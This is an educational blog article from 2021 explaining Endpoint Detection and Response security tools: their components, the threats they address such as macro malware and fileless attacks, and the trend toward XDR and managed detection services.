By: Elviraluke Napwora
August 2, 2021
LET’S DELVE INTO THE WORLD OF ENDPOINT DETECTION AND RESPONSE (EDR)
By: Elviraluke Napwora
August 2, 2021
The rise of endpoint devices in the corporate environment has increased organizations' security risks as each device is a potential attack surface. To counter some of these challenges, an organization must implement an endpoint security strategy with the necessary tools, such as EDR.
Endpoint Detection and Response (EDR) solutions provide an integrated view of the security of endpoint nodes through continuous real-time monitoring of system activities on endpoints. The data collected on the endpoints provide further insights, security analysis, and automated response in your environment when security incidents occur. The graphical view capability provided by EDR allows one to map out the various activities that an attacker undertook while inside your environment. This provides security teams with comprehensive visibility of incidents occurring in your environment and their characteristics.
From advanced threat detection and investigation, automated response capabilities, incident alert triage, suspicious activity validation, proactive threat hunting, etc., EDR's capabilities are limitless. The collective intelligence provided by EDR increases its ability to identify several threats (zero-day exploits, multi-layered attacks, advanced persistent threats, fileless malware attacks, etc.) that would evade legacy security solutions such as antiviruses. Thus, it provides an additional layer of endpoint protection against otherwise hidden threats.
MAIN COMPONENTS OF EDR SECURITY
The key components of EDR security are centered around the collection, correlation, and analysis of endpoint data. This provides a coordinated approach in reviewing alerts and the responses undertaken afterward when an incident occurs. The basic components of EDR tools include:
Endpoint data collection agents- The software agents monitor and collect activity data from endpoints on various indicators of compromise that could indicate a threat. Some of the data collected include; device processes, network connections, device activity, and volume of data transfers. The aggregated crowdsourced data is then used to guide how best to respond when malicious activity is detected.
Automated response- identifies threats through the use of the pre-configured rules and analysis of the collected data. Automation is key in ensuring all incidents are thoroughly investigated (identification and response to security threats)in record speed (minutes rather than hours). The triggered automatic response could entail containing or removing the specific threat, blocking users, notifying the necessary security personnel, etc.
Forensics analysis- tools and capabilities to search for suspicious activities, perform user behavior analytics, and research identified threats. Through Real-time analytics, the large volume of data collected is evaluated and correlated in a bid to identify /search for patterns that would highly indicate a threat. On the other hand, the forensics tools allow for threat hunting and post-attack analysis by security professionals geared towards understanding exploits/ investigating past security breaches. From the custom indicators of compromise identified on each endpoint, a proactive defense strategy can be developed against future attacks.
KEY THREATS THAT SPARKED THE DEVELOPMENT OF EDR
Endpoint Detection and Response (EDR) solutions were developed to fill the security gaps left by other tools due to advancements in security attacks by attackers in malicious code deployment. Thus, the attacks could easily bypass the traditional security measures, which rely heavily on identifying malicious executables in identifying malware. Attacks have since moved to use techniques that allow running malicious code without having to install the malware.
The section below looks at key events that sparked the development of EDR and necessitated its use:
1. Document-Based Malware
Traditionally, security awareness training has focused on enlightening users on potential threats which can occur when downloading and/or executing unknown applications. Unfortunately, many users are unaware of the high risk posed by document files, which also can run malicious processes. Thus, attacks have moved to leverage this to deliver malware/ malicious scripts through files which users are much more likely to open, such as Excel, PDF, Word, or PowerPoint files. One example of document malware is when it is hidden in macros; macros is a scripted instruction useful in automating business tasks and processes to increase efficiency. In this instance, the logical security solution would be to completely block macros to defend against this type of attack while simultaneously affecting the business efficiency brought about by macros. EDR solutions address this challenge by using both static and dynamic malware analysis capabilities to check whether a given item such as a macro should be flagged as malicious.
2. Fileless Attacks
Fileless malware operates in the computer's memory through executing processes or taking advantage of trusted system processes to execute code. The attacks do not require any files to be stored and thus are more difficult to detect using standard methods that rely on scanning for malware signatures. In this instance, the behavioral analysis provides a solution to the security challenges posed. EDR has behavioral analysis features as part of its components to solve this challenge.
Learn more about Dynamic Malware Analysis from the Static and Dynamic Malware Analysis Virtual Lab.
3. Antivirus Limitations
Legacy antivirus solutions use signature-based methods to identify malware and malicious processes, which means that the antivirus' security is limited to only previously known or identified malware signatures. Unfortunately, this is not sufficient in a world where security threats/exploits grow exponentially.
The rise of Next-Generation Antivirus (NGAV) will address some of the challenges posed by traditional antivirus; it will incorporate behavior analysis, machine learning, and AI in malware detection. By doing so, NGAVs can examine more artifacts, such as file hashes, URLs, and IP addresses, as well as signature-based detection.
FUTURE OF EDR: THE MOVE TO XDR AND MDR
Security solutions are in constant evolution due to the rapid change in how attackers deploy attacks and the technology revolution. Although EDR has been efficient in handling the security challenges this far, more efficient tools have evolved like the XDR and MDR.
XDR refers to the enhanced detection and response capabilities across broader systems and networks. These could include cloud services, on-premise infrastructure, data centers, and Internet of Things (IoT) networks. The unified visibility across the systems and networks provides context for the security events noted, and thus attacks in your environment can be identified early on by analysts.
The rise of managed EDR (MDR) brings up another aspect of how EDR solutions are evolving. MDR solutions provide Security-as-a-Service to organizations through a 24/7 security operations center (SOC) and the security expertise necessary to extend the benefits an organization cost-effectively gets from XDR.